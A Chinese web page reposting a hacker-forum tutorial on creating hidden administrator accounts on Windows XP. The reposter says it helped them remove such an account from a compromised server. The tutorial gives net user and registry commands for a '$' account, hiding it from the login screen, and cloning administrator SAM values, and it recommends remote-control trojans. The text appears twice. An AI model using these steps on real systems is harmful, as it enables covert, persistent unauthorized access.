关于WINXP隐藏帐户
来源:互联网 发布:内涵谷 源码下载 编辑:程序博客网 时间:2024/05/14 04:13
关于隐藏帐户
http://www.mzjj.net/post/72.html
这篇文章是今天清理被入侵的服务器时在中国黑客联盟上找到的,主要是对入侵中建立隐藏帐户的手法进行一点介绍,作者自己说技术含量低主要还是针对新手。
**********************************************
1: $利用
一般在入侵时如果建立用户的话都会加上$,命令如下:
C:/Documents and Settings/pwolf>net user w$ cool /add
命令成功完成。
添加到管理员组:
C:/Documents and Settings/pwolf>net localgroup administrators w$ /add
命令成功完成。
在用户名后加上$,用net user命令是查不出来的,如下:
C:/Documents and Settings/pwolf>net user
//PWOLF-E39196738 的用户帐户
-------------------------------------------------------------------------------
__vmware_user__ Administrator Guest
HelpAssistant SUPPORT_388945a0
命令成功完成。
而查询管理员组(刚才已提为管理员)是是可以看到的,如:
C:/Documents and Settings/pwolf>net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
pwolf
w$
命令成功完成。
例外:对于XP系统,即使用户名后加$,在登陆界面 也会显示我们建得用户,这里只要在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList 下将我们所建用户的表项的DWORD值改为0 即可,如果没有没有这个项可以新建,这里就是w$了。
在入侵XP系统时 ,最好不要添加用户,因为即使对方开启了终端服务(3389),XP也是不支持多用户的,还是开它的4899(RADMIN)或是灰鸽子等其他的远程控制软件。
2,网上流传的建立隐藏帐户的方法
这种方法网上很多教程,这里也简单介绍。
接上一步骤:
1。打开注册表编辑器(regedit),到HKEY_LOCAL_MACHINE/SAM/SAM 下 如果看不到子键,选中 HKEY_LOCAL_MACHINE/SAM/SAM然后右键-权限,将你所登陆的用户名添加进去,并且赋予完全控制权力。然后打开注册表(regedit)到HKLM/SAM/SAM/Domains/Account/Users中,这里保存里用户的信息,下面的十六进制项都是用户的sid,比如用户Administrator的sid是000001F4,guest的sid是000001F5。将相应的注册表项 w$,000003FA(w$对应的SID项),000003FB(管理员对应的注册表项,我用的是pwolf也是管理员身份)导出为w.reg,000003FA.reg,000003FB.reg,然后编辑REG文件将管理员(000003FB)的F值 覆盖000003FA的F值,后将000003FA.REG(修改完F值后的)的内容合并到W.REG.
附:对于修改注册表的访问权限的设置 ,在XP,2003里只要打开regedit就可以了再里面设置同上步骤,而对于2000要先打开regedt32给予SAM的访问权限,然后在打开注册表(REGEDIT)就可以看到SAM下的子键。
2。删除用户W$. 命令:
NET USER W$ /DEL .
然后导入WOLF.REG。
这样建立的用户一开始在管理工具和命令行下都是看不到的,在注册表里还是能看到的(利用AFX Rootkit 2005可以隐藏,没有时间写以后再说
了)。但重启后在管理工具-计算机管理-本地用户和组里还是能看到的,具体分析看这篇文章http://www.cnhacker.com/bbs/read.php?tid=25430&fpage=1(我在XP下测试是这种情况)
还有一种情况就是这个用户在CMD 和计算机管理里 直接删是删不了, 提示:用户不属于这个组! 安全模式也是如此。 只能到
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users 下将相关项删掉。
在XP里这种方法即使不修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList下我们所建用户的表项的DWORD值,在登陆界面也不会显示的。
**********************************************
今天清理被入侵的那台服务器上被加的用户就是属于在CMD和计算机管理里都删不掉的,根据上面的方法最终还是删掉了。把本文到这里贴出来,希望能对和遇上我一样的朋友有点帮助。
**********************************************
1: $利用
一般在入侵时如果建立用户的话都会加上$,命令如下:
C:/Documents and Settings/pwolf>net user w$ cool /add
命令成功完成。
添加到管理员组:
C:/Documents and Settings/pwolf>net localgroup administrators w$ /add
命令成功完成。
在用户名后加上$,用net user命令是查不出来的,如下:
C:/Documents and Settings/pwolf>net user
//PWOLF-E39196738 的用户帐户
-------------------------------------------------------------------------------
__vmware_user__ Administrator Guest
HelpAssistant SUPPORT_388945a0
命令成功完成。
而查询管理员组(刚才已提为管理员)是是可以看到的,如:
C:/Documents and Settings/pwolf>net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
pwolf
w$
命令成功完成。
例外:对于XP系统,即使用户名后加$,在登陆界面 也会显示我们建得用户,这里只要在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList 下将我们所建用户的表项的DWORD值改为0 即可,如果没有没有这个项可以新建,这里就是w$了。
在入侵XP系统时 ,最好不要添加用户,因为即使对方开启了终端服务(3389),XP也是不支持多用户的,还是开它的4899(RADMIN)或是灰鸽子等其他的远程控制软件。
2,网上流传的建立隐藏帐户的方法
这种方法网上很多教程,这里也简单介绍。
接上一步骤:
1。打开注册表编辑器(regedit),到HKEY_LOCAL_MACHINE/SAM/SAM 下 如果看不到子键,选中 HKEY_LOCAL_MACHINE/SAM/SAM然后右键-权限,将你所登陆的用户名添加进去,并且赋予完全控制权力。然后打开注册表(regedit)到HKLM/SAM/SAM/Domains/Account/Users中,这里保存里用户的信息,下面的十六进制项都是用户的sid,比如用户Administrator的sid是000001F4,guest的sid是000001F5。将相应的注册表项 w$,000003FA(w$对应的SID项),000003FB(管理员对应的注册表项,我用的是pwolf也是管理员身份)导出为w.reg,000003FA.reg,000003FB.reg,然后编辑REG文件将管理员(000003FB)的F值 覆盖000003FA的F值,后将000003FA.REG(修改完F值后的)的内容合并到W.REG.
附:对于修改注册表的访问权限的设置 ,在XP,2003里只要打开regedit就可以了再里面设置同上步骤,而对于2000要先打开regedt32给予SAM的访问权限,然后在打开注册表(REGEDIT)就可以看到SAM下的子键。
2。删除用户W$. 命令:
NET USER W$ /DEL .
然后导入WOLF.REG。
这样建立的用户一开始在管理工具和命令行下都是看不到的,在注册表里还是能看到的(利用AFX Rootkit 2005可以隐藏,没有时间写以后再说
了)。但重启后在管理工具-计算机管理-本地用户和组里还是能看到的,具体分析看这篇文章http://www.cnhacker.com/bbs/read.php?tid=25430&fpage=1(我在XP下测试是这种情况)
还有一种情况就是这个用户在CMD 和计算机管理里 直接删是删不了, 提示:用户不属于这个组! 安全模式也是如此。 只能到
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users 下将相关项删掉。
在XP里这种方法即使不修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList下我们所建用户的表项的DWORD值,在登陆界面也不会显示的。
**********************************************
今天清理被入侵的那台服务器上被加的用户就是属于在CMD和计算机管理里都删不掉的,根据上面的方法最终还是删掉了。把本文到这里贴出来,希望能对和遇上我一样的朋友有点帮助。
- 关于WINXP隐藏帐户
- 隐藏帐户
- Linux隐藏帐户
- 让XP隐藏用户帐户
- DOS下建立隐藏帐户
- 隐藏在WinXP中的秘密武器
- 隐藏在WinXP中的实用工具
- 隐藏在WinXP中的秘密武器
- 隐藏在WinXP中的秘密武器
- 隐藏在WinXP中的工具
- 关于实验帐户
- 关于零余额帐户
- 关于winXP管理员密码
- window下怎样创建隐藏帐户
- 如何创建和删除系统隐藏帐户
- 彻底删除电脑的隐藏帐户
- windows2003下创建永远的隐藏帐户
- 关于激进帐户的话题
- 明天开始闭关
- Oracle高效SQL语句原则
- javascript foreach
- 计算机的一些基本概念
- C++学习笔记之“动态数组”
- 关于WINXP隐藏帐户
- soa
- java读注册表项
- 这样的开源基金设想行得通吗?
- 逻辑推理游戏(不想动脑子的就别进了)
- JDBC常见问题
- 去划起那艘船吧
- jsp,iis+tomcat
- AJAX设计策略(全)